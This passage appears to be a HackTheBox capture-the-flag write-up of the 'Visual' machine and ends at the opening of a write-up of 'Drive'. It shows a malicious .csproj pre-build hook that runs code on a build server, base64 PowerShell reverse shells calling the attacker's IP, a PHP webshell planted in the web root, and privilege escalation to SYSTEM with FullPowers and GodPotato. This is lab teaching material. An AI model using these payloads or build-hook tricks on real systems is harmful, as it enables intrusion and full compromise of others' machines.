EndGlobalSection
EndGlobal
Now the .sln has a reference to the .csproj.
This builds and runs:
root@ef5f5f0ac789:/HelloLiunx# dotnet build
MSBuild version 17.3.2+561848881 for .NET
Determining projects to restore...
All projects are up-to-date for restore.
HelloLiunx -> /HelloLiunx/bin/Debug/net6.0/HelloLiunx.dll
Build succeeded.
0 Warning(s)
0 Error(s)
Time Elapsed 00:00:01.69
root@ef5f5f0ac789:/HelloLiunx# dotnet run
Hello, World!
root@ef5f5f0ac789:/HelloLiunx# ls bin/Debug/net6.0/
HelloLiunx HelloLiunx.deps.json HelloLiunx.dll HelloLiunx.pdb HelloLiunx.runtimeconfig.json
I’ll push that to Gitea the same way as the previous one, creating a new repo and then adding the remote (now back in my VM, out of the container):
oxdf@hacky$ git init
Initialized empty Git repository in /media/sf_CTFs/hackthebox/visual-10.10.11.234/projects/HelloLinux/.git/
oxdf@hacky$ git add .
oxdf@hacky$ git commit -m "hello world from linux"
[main (root-commit) b724c06] hello world from linux
27 files changed, 285 insertions(+)
create mode 100644 HelloLinux.csproj
create mode 100644 HelloLinux.sln
create mode 100644 Program.cs
create mode 100644 bin/Debug/net8.0/HelloLinux
create mode 100644 bin/Debug/net8.0/HelloLinux.deps.json
create mode 100644 bin/Debug/net8.0/HelloLinux.dll
create mode 100644 bin/Debug/net8.0/HelloLinux.pdb
create mode 100644 bin/Debug/net8.0/HelloLinux.runtimeconfig.json
create mode 100644 obj/Debug/net8.0/.NETCoreApp,Version=v8.0.AssemblyAttributes.cs
create mode 100644 obj/Debug/net8.0/HelloLinux.AssemblyInfo.cs
create mode 100644 obj/Debug/net8.0/HelloLinux.AssemblyInfoInputs.cache
create mode 100644 obj/Debug/net8.0/HelloLinux.GeneratedMSBuildEditorConfig.editorconfig
create mode 100644 obj/Debug/net8.0/HelloLinux.GlobalUsings.g.cs
create mode 100644 obj/Debug/net8.0/HelloLinux.assets.cache
create mode 100644 obj/Debug/net8.0/HelloLinux.csproj.CoreCompileInputs.cache
create mode 100644 obj/Debug/net8.0/HelloLinux.csproj.FileListAbsolute.txt
create mode 100644 obj/Debug/net8.0/HelloLinux.dll
create mode 100644 obj/Debug/net8.0/HelloLinux.genruntimeconfig.cache
create mode 100644 obj/Debug/net8.0/HelloLinux.pdb
create mode 100644 obj/Debug/net8.0/apphost
create mode 100644 obj/Debug/net8.0/ref/HelloLinux.dll
create mode 100644 obj/Debug/net8.0/refint/HelloLinux.dll
create mode 100644 obj/HelloLinux.csproj.nuget.dgspec.json
create mode 100644 obj/HelloLinux.csproj.nuget.g.props
create mode 100644 obj/HelloLinux.csproj.nuget.g.targets
create mode 100644 obj/project.assets.json
create mode 100644 obj/project.nuget.cache
oxdf@hacky$ git remote add origin http://10.10.14.6:3000/0xdf/HelloLinux.git
oxdf@hacky$ git push -u origin main
Username for 'http://10.10.14.6:3000': 0xdf
Password for 'http://0xdf@10.10.14.6:3000':
Enumerating objects: 32, done.
Counting objects: 100% (32/32), done.
Delta compression using up to 8 threads
Compressing objects: 100% (28/28), done.
Writing objects: 100% (32/32), 43.57 KiB | 5.45 MiB/s, done.
Total 32 (delta 2), reused 0 (delta 0), pack-reused 0
remote: . Processing 1 references
remote: Processed 1 references in total
To http://10.10.14.6:3000/0xdf/HelloLinux.git
* [new branch] main -> main
Branch 'main' set up to track remote branch 'main' from 'origin'.
I’ll submit both of these to Visual via the web form. The result for my project returns the same files I got when building above:
If I have the .exe, the .dll, and the .runtimeconfig.json file in the same directory, they run:
PS Z:\hackthebox\visual-10.10.11.234 > .\Hello0xdf.exe
Hello, 0xdf!
The Linux build is similar (as long as I have the .NET version correct):
It is possible to configure a project to run “pre-build” and “post-build” event commands. This article from HowToGeek goes into it. My idea here is to use a pre-build command to get execution when I submit it to the site and it builds the project. I’ll show three ways to do this:
flowchart TD;
C[Add in VS]-->B;
A[Modify .csproj]-->B(RCE);
D[RCE Project\nfrom Github]-->B;
linkStyle default stroke-width:2px,stroke:#FFFF99,fill:none;
In Visual Studio, I’ll go to “Project” -> “Hello0xdf Properties” to get the properties dialog, and under “Build” -> “Events” there’s a “Pre-build event” section. I’ll add a ping:
If I try to build the project now, I’ll see it’s trying to ping my VPN IP (which the Windows VM isn’t aware of):
Looking at git, there are a few updated files, but it’s the .csproj file that’s interesting:
oxdf@hacky$ git status
On branch main
Your branch is up to date with 'origin/main'.
Changes not staged for commit:
(use "git add <file>..." to update what will be committed)
(use "git restore <file>..." to discard changes in working directory)
modified: .vs/Hello0xdf/DesignTimeBuild/.dtbcache.v2
modified: .vs/Hello0xdf/v17/.suo
modified: Hello0xdf/Hello0xdf.csproj
Untracked files:
(use "git add <file>..." to include in what will be committed)
.vs/Hello0xdf/v17/.futdcache.v2
.vs/ProjectEvaluation/
no changes added to commit (use "git add" and/or "git commit -a")
I’ll push that to Gitea:
oxdf@hacky$ git add .
oxdf@hacky$ git commit -m "added pre-build ping"
[main adb2d18] added pre-build ping
6 files changed, 4 insertions(+)
create mode 100644 .vs/Hello0xdf/v17/.futdcache.v2
rewrite .vs/Hello0xdf/v17/.suo (67%)
create mode 100644 .vs/ProjectEvaluation/hello0xdf.metadata.v7.bin
create mode 100644 .vs/ProjectEvaluation/hello0xdf.projects.v7.bin
oxdf@hacky$ git push
Username for 'http://10.10.14.6:3000': 0xdf
Password for 'http://0xdf@10.10.14.6:3000':
Enumerating objects: 23, done.
Counting objects: 100% (23/23), done.
Delta compression using up to 8 threads
Compressing objects: 100% (13/13), done.
Writing objects: 100% (14/14), 55.60 KiB | 5.56 MiB/s, done.
Total 14 (delta 4), reused 0 (delta 0), pack-reused 0
remote: . Processing 1 references
remote: Processed 1 references in total
To http://10.10.14.6:3000/0xdf/Hello0xdf.git
affd06e..adb2d18 main -> main
I’ll submit this repo to Visual, and have tcpdump listening for ICMP. After a couple minutes, I get pinged:
oxdf@hacky$ sudo tcpdump -ni tun0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
11:28:02.138137 IP 10.10.11.234 > 10.10.14.6: ICMP echo request, id 1, seq 5, length 40
11:28:02.138179 IP 10.10.14.6 > 10.10.11.234: ICMP echo reply, id 1, seq 5, length 40
11:28:03.144755 IP 10.10.11.234 > 10.10.14.6: ICMP echo request, id 1, seq 6, length 40
11:28:03.144784 IP 10.10.14.6 > 10.10.11.234: ICMP echo reply, id 1, seq 6, length 40
11:28:04.160208 IP 10.10.11.234 > 10.10.14.6: ICMP echo request, id 1, seq 7, length 40
11:28:04.160229 IP 10.10.14.6 > 10.10.11.234: ICMP echo reply, id 1, seq 7, length 40
11:28:05.175882 IP 10.10.11.234 > 10.10.14.6: ICMP echo request, id 1, seq 8, length 40
11:28:05.175901 IP 10.10.14.6 > 10.10.11.234: ICMP echo reply, id 1, seq 8, length 40
And then it reports success:
The file that changed was the .csproj file, so I can just update that in my HelloLinux project. It starts as:
<Project Sdk="Microsoft.NET.Sdk">
<PropertyGroup>
<OutputType>Exe</OutputType>
<TargetFramework>net6.0</TargetFramework>
<ImplicitUsings>enable</ImplicitUsings>
<Nullable>enable</Nullable>
</PropertyGroup>
</Project>
I’ll add a “PreBuild” target:
<Project Sdk="Microsoft.NET.Sdk">
<PropertyGroup>
<OutputType>Exe</OutputType>
<TargetFramework>net6.0</TargetFramework>
<ImplicitUsings>enable</ImplicitUsings>
<Nullable>enable</Nullable>
</PropertyGroup>
<Target Name="PreBuild" BeforeTargets="PreBuildEvent">
<Exec Command="ping 10.10.14.6" />
</Target>
</Project>
If I dotnet build this in the container:
root@cdb07b3737f8:/HelloLiunx# dotnet build
MSBuild version 17.3.2+561848881 for .NET
Determining projects to restore...
All projects are up-to-date for restore.
/bin/sh: 2: /tmp/MSBuildTemproot/tmp975b311408f24122bd271e2d6258d014.exec.cmd: ping: not found
/HelloLiunx/HelloLiunx.csproj(10,5): error MSB3073: The command "ping 10.10.14.6" exited with code 127.
Build FAILED.
/HelloLiunx/HelloLiunx.csproj(10,5): error MSB3073: The command "ping 10.10.14.6" exited with code 127.
0 Warning(s)
1 Error(s)
Time Elapsed 00:00:00.64
It fails because ping is not found in the SDK container. That’s ok; it’s trying to run the command!
I’ll update Git and push to Gitea:
oxdf@hacky$ git add HelloLiunx.csproj
oxdf@hacky$ git commit -m "added ping prebuild"
[main 19a7a39] added ping prebuild
1 file changed, 3 insertions(+)
oxdf@hacky$ git push
Username for 'http://10.10.14.6:3000': 0xdf
Password for 'http://0xdf@10.10.14.6:3000':
Enumerating objects: 5, done.
Counting objects: 100% (5/5), done.
Delta compression using up to 8 threads
Compressing objects: 100% (3/3), done.
Writing objects: 100% (3/3), 385 bytes | 385.00 KiB/s, done.
Total 3 (delta 2), reused 0 (delta 0), pack-reused 0
remote: . Processing 1 references
remote: Processed 1 references in total
To http://10.10.14.6:3000/0xdf/HelloLinux.git
b74c17c..19a7a39 main -> main
Now when I resubmit the URL for this repo, I get ICMP packets at my host from Visual:
oxdf@hacky$ sudo tcpdump -ni tun0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
13:59:00.653574 IP 10.10.11.234 > 10.10.14.6: ICMP echo request, id 1, seq 13, length 40
13:59:00.653601 IP 10.10.14.6 > 10.10.11.234: ICMP echo reply, id 1, seq 13, length 40
13:59:01.658623 IP 10.10.11.234 > 10.10.14.6: ICMP echo request, id 1, seq 14, length 40
13:59:01.658638 IP 10.10.14.6 > 10.10.11.234: ICMP echo reply, id 1, seq 14, length 40
13:59:02.673184 IP 10.10.11.234 > 10.10.14.6: ICMP echo request, id 1, seq 15, length 40
13:59:02.673211 IP 10.10.14.6 > 10.10.11.234: ICMP echo reply, id 1, seq 15, length 40
13:59:03.689172 IP 10.10.11.234 > 10.10.14.6: ICMP echo request, id 1, seq 16, length 40
13:59:03.689197 IP 10.10.14.6 > 10.10.11.234: ICMP echo reply, id 1, seq 16, length 40
And then it shows success:
It turns out that the author of this box also has a repo on GitHub called vs-rce that’s been up since before Visual’s release. It’s a simple VS project:
In rce, the Program.cs is the default Hello World. The rce.csproj has the trigger (done slightly more simply than I showed):
<Project Sdk="Microsoft.NET.Sdk">
<PropertyGroup>
<OutputType>Exe</OutputType>
<TargetFramework>net6.0</TargetFramework>
<ImplicitUsings>enable</ImplicitUsings>
<Nullable>enable</Nullable>
<PreBuildEvent>calc.exe</PreBuildEvent>
</PropertyGroup>
</Project>
In my Gitea instance, I’ll select “New Migration”:
I’ll select GitHub, and on the next page give it the URL for this repo. It copies the repo into Gitea:
I’ll edit the rce.csproj file to replace calc.exe with ping 10.10.14.6:
I’ll save and commit that, and then submit the URL for this repo to Visual. After a minute or so, there’s ICMP packets:
oxdf@hacky$ sudo tcpdump -ni tun0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
14:04:52.304056 IP 10.10.11.234 > 10.10.14.6: ICMP echo request, id 1, seq 17, length 40
14:04:52.304089 IP 10.10.14.6 > 10.10.11.234: ICMP echo reply, id 1, seq 17, length 40
14:04:53.312126 IP 10.10.11.234 > 10.10.14.6: ICMP echo request, id 1, seq 18, length 40
14:04:53.312151 IP 10.10.14.6 > 10.10.11.234: ICMP echo reply, id 1, seq 18, length 40
14:04:54.326953 IP 10.10.11.234 > 10.10.14.6: ICMP echo request, id 1, seq 19, length 40
14:04:54.326978 IP 10.10.14.6 > 10.10.11.234: ICMP echo reply, id 1, seq 19, length 40
14:04:55.342651 IP 10.10.11.234 > 10.10.14.6: ICMP echo request, id 1, seq 20, length 40
14:04:55.342669 IP 10.10.14.6 > 10.10.11.234: ICMP echo reply, id 1, seq 20, length 40
To get a shell, I’ll update the HelloLinux.csproj file, replacing the ping with a PowerShell one-liner (PowerShell #3 (Base64) from https://www.revshells.com/):
<Project Sdk="Microsoft.NET.Sdk">
<PropertyGroup>
<OutputType>Exe</OutputType>
<TargetFramework>net6.0</TargetFramework>
<ImplicitUsings>enable</ImplicitUsings>
<Nullable>enable</Nullable>
</PropertyGroup>
<Target Name="PreBuild" BeforeTargets="PreBuildEvent">
<Exec Command="powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4ANgAiACwANAA0ADMAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA" />
</Target>
</Project>
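That -e payload is just the command text encoded as UTF-16LE and then base64’d, so it can be regenerated for any IP/port from Linux without a generator site. A sketch (the `psencode` helper name is my own):

```shell
# Encode a PowerShell command for use with `powershell -e`.
# -e expects base64 of the UTF-16LE bytes of the command text.
psencode() {
    printf '%s' "$1" | iconv -f UTF-8 -t UTF-16LE | base64 -w0
}
psencode 'whoami'    # prints dwBoAG8AYQBtAGkA
```

Decoding the blob above the same way (base64 -d, then iconv back to UTF-8) is also a quick way to verify what a payload actually does before running it.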
I’ll add and commit that to git, then push to Gitea and resubmit to Visual. Eventually, I get a shell at nc:
oxdf@hacky$ rlwrap -cAr nc -lnvp 443
Listening on 0.0.0.0 443
Connection received on 10.10.11.234 49698
PS C:\Windows\Temp\acd49d47976809051b1f24cba31553> whoami
visual\enox
I can get the user flag:
PS C:\users\enox\desktop> type user.txt
11d634b6************************
The host is relatively empty. The only other interesting thing in the enox user’s home directory is compile.ps1, which seems to handle the compilation for the website. It reads a list of submissions to compile from a text file:
$todofile="C:\\xampp\htdocs\uploads\todo.txt"
It then loops through that file, processing and compiling each submission with msbuild.exe and updating the todo.txt file.
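The design amounts to a poll-and-build loop. As a rough bash analog (the real script is PowerShell and shells out to msbuild.exe; the file path and URLs here are made up):

```shell
# Hypothetical sketch of compile.ps1's loop: pop the first queued
# submission, build it, and rewrite the todo file without that line.
TODO=/tmp/todo_demo.txt   # stand-in for C:\xampp\htdocs\uploads\todo.txt
printf 'http://gitea/repo1.git\nhttp://gitea/repo2.git\n' > "$TODO"
while [ -s "$TODO" ]; do
    url=$(head -n1 "$TODO")                   # next submission to build
    echo "building $url"                      # stand-in for git clone + msbuild
    tail -n +2 "$TODO" > "$TODO.tmp" && mv "$TODO.tmp" "$TODO"
done
```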
This isn’t useful for a next step on its own, but it does show that enox can read and write within at least part of the xampp directories.
The C:\xampp\htdocs directory is the root of the webserver:
PS C:\xampp\htdocs> ls
Directory: C:\xampp\htdocs
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 6/10/2023 10:32 AM assets
d----- 6/10/2023 10:32 AM css
d----- 6/10/2023 10:32 AM js
d----- 2/21/2024 11:17 AM uploads
-a---- 6/10/2023 6:20 PM 7534 index.php
-a---- 6/10/2023 4:17 PM 1554 submit.php
-a---- 6/10/2023 4:11 PM 4970 vs_status.php
I’ll try writing a PHP file there:
PS C:\xampp\htdocs> Set-Content -path 0xdf.php -Value '<?php phpinfo(); ?>'
It works:
It’s worth noting that PowerShell is weird about encoding if I use echo. For example:
PS C:\xampp\htdocs> echo '<?php phpinfo(); ?>' > fail.php
This will not work because it writes 16-bit characters (as can be seen in the size of the files):
PS C:\xampp\htdocs> ls
Directory: C:\xampp\htdocs
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 6/10/2023 10:32 AM assets
d----- 6/10/2023 10:32 AM css
d----- 6/10/2023 10:32 AM js
d----- 2/21/2024 11:17 AM uploads
-a---- 2/21/2024 11:24 AM 21 0xdf.php
-a---- 2/21/2024 11:26 AM 44 fail.php
-a---- 6/10/2023 6:20 PM 7534 index.php
-a---- 6/10/2023 4:17 PM 1554 submit.php
-a---- 6/10/2023 4:11 PM 4970 vs_status.php
fail.php is twice the size of 0xdf.php, despite the content looking the same. I can also see this by fetching fail.php from the webserver:
oxdf@hacky$ curl -s 10.10.11.234/fail.php -o- | xxd
00000000: fffe 3c00 3f00 7000 6800 7000 2000 7000 ..<.?.p.h.p. .p.
00000010: 6800 7000 6900 6e00 6600 6f00 2800 2900 h.p.i.n.f.o.(.).
00000020: 3b00 2000 3f00 3e00 0d00 0a00 ;. .?.>.....
That encoding (note the ff fe byte-order mark at the start) is causing XAMPP to not run it as PHP.
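This matches the size doubling seen in the directory listing: Windows PowerShell’s `>` redirection (Out-File) defaults to UTF-16LE, so every character takes two bytes, while Set-Content writes single-byte text. A local demonstration (hypothetical /tmp paths) with iconv:

```shell
# Demonstrate the size doubling: the same text as UTF-8 vs UTF-16LE.
printf '<?php phpinfo(); ?>\n' > /tmp/ok.php
printf '<?php phpinfo(); ?>\n' | iconv -f UTF-8 -t UTF-16LE > /tmp/wide.php
wc -c /tmp/ok.php /tmp/wide.php    # the UTF-16LE copy is exactly twice the size
```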
I’ll update 0xdf.php to a PHP webshell:
PS C:\xampp\htdocs> Set-Content -path 0xdf.php -Value '<?php system($_REQUEST["cmd"]); ?>'
The site is running as nt authority\local service:
I’ll replace whoami with the reverse shell from above, and on hitting enter, there’s a shell at nc:
oxdf@hacky$ rlwrap -cAr nc -lnvp 443
Listening on 0.0.0.0 443
Connection received on 10.10.11.234 49699
PS C:\xampp\htdocs> whoami
nt authority\local service
I would expect local service to have some privileges, but it seems that they have been stripped away:
PS C:\xampp\htdocs> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
When Windows starts a service as local service or network service, the service starts with a reduced set of the privileges that might otherwise be available to that user. A researcher found that if a scheduled task is started as one of those users, the full set of privileges comes with it, including SeImpersonate.
A tool, FullPowers, automates that process. There’s a compiled .exe on the release page.
I’ll download the executable to my host, and serve it with a Python web server. I’ll fetch it with wget on Visual:
PS C:\programdata> wget 10.10.14.6/FullPowers.exe -outfile FullPowers.exe
If I just run this, it seems to work, but then doesn’t:
PS C:\programdata> .\FullPowers.exe
[+] Started dummy thread with id 2076
[+] Successfully created scheduled task.
[+] Got new token! Privilege count: 7
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.17763.4851]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
PS C:\programdata>
That’s because of how my reverse shell is running. It’s doing a loop to run commands, return the result, and then wait. In this case, it runs FullPowers.exe, which results in a new prompt, but then that exits and it drops back to my original prompt without the new powers.
If I give it whoami /priv, it confirms that it is working:
PS C:\programdata> .\FullPowers.exe -c "whoami /priv"
[+] Started dummy thread with id 2328
[+] Successfully created scheduled task.
[+] Got new token! Privilege count: 7
[+] CreateProcessAsUser() OK
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= =======
SeAssignPrimaryTokenPrivilege Replace a process level token Enabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeAuditPrivilege Generate security audits Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
There’s a bunch more privileges there, including SeImpersonate.
I’ll give it the same reverse shell again:
PS C:\programdata> .\FullPowers.exe -c "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4ANgAiACwANAA0ADMAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA"
It hangs, but at nc:
oxdf@hacky$ rlwrap -cAr nc -lnvp 443
Listening on 0.0.0.0 443
Connection received on 10.10.11.234 49708
PS C:\Windows\system32>
And this shell has SeImpersonate:
PS C:\Windows\system32> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= =======
SeAssignPrimaryTokenPrivilege Replace a process level token Enabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeAuditPrivilege Generate security audits Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
I’ve shown many Potato exploits over the years. Microsoft keeps trying to block ways to use SeImpersonate to get a system shell, and researchers keep finding new ways. The current popular exploit is GodPotato.
I’ll download the latest release (https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET4.exe) to my host, and serve it with a Python web server. From Visual, I’ll fetch it:
PS C:\programdata> wget 10.10.14.6/GodPotato-NET4.exe -outfile gp.exe
Running it without args gives the usage, and running the example shows it gets system:
PS C:\programdata> .\gp.exe -cmd "cmd /c whoami"
[*] CombaseModule: 0x140715322900480
[*] DispatchTable: 0x140715325206640
[*] UseProtseqFunction: 0x140715324582816
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\072a5030-acb7-4e49-bd61-f21fe7ca2b09\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00006c02-12b0-ffff-cbf0-93d7ee1fce8a
[*] DCOM obj OXID: 0xdd2bb902652bc07
[*] DCOM obj OID: 0x89cf102b060e442b
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 872 Token:0x816 User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 1672
nt authority\system
I’ll get a reverse shell and run it:
PS C:\programdata> .\gp.exe -cmd "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4ANgAiACwANAA0ADUAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA"
It just hangs, but at nc
:
oxdf@hacky$ rlwrap -cAr nc -lnvp 445
Listening on 0.0.0.0 445
Connection received on 10.10.11.234 49716
PS C:\programdata> whoami
nt authority\system
And I can grab the flag:
PS C:\users\administrator\desktop> type root.txt
e3563d96************************
Drive has a website that provides cloud storage. I’ll abuse an IDOR vulnerability to get access to the administrator’s files and leak some creds providing SSH access. From there I’ll access a Gitea instance and use the creds to get access to a backup script and the password for site backups. In these backups, I’ll find hashes for another user and crack them to get their password. For root, there’s a command line client binary that has a buffer overflow. I’ll show that, as well as two ways to get RCE via an unintended SQL injection.
Name | Drive Play on HackTheBox |
---|---|
Release Date | 14 Oct 2023 |
Retire Date | 17 Feb 2024 |
OS | Linux |
Base Points | Hard [40] |
Rated Difficulty | |
Radar Graph | |
00:38:51 | |
01:35:01 | |
Creator |
nmap
finds two open TCP ports, SSH (22) and HTTP (80), as well as port 3000 filtered:
